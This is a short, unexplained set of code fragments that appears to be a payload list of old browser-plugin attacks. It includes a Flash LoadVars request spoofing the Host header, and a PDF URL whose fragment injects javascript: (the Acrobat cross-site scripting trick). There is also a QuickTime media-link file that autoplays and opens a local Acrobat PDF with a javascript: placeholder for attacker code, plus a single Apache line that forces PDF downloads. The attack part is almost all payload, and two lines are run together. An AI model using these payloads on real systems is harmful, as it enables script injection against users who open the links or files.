var req = new LoadVars();
req.addRequestHeader("Host:", "host.example.com");
req.send("http://host.foo.com/", "_blank");http://example.org/foo.pdf#bar=javascript:alert('XSS');
AddType application/octet-stream .pdf
file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:...
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true"
qtnext="file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:your_code_here"/>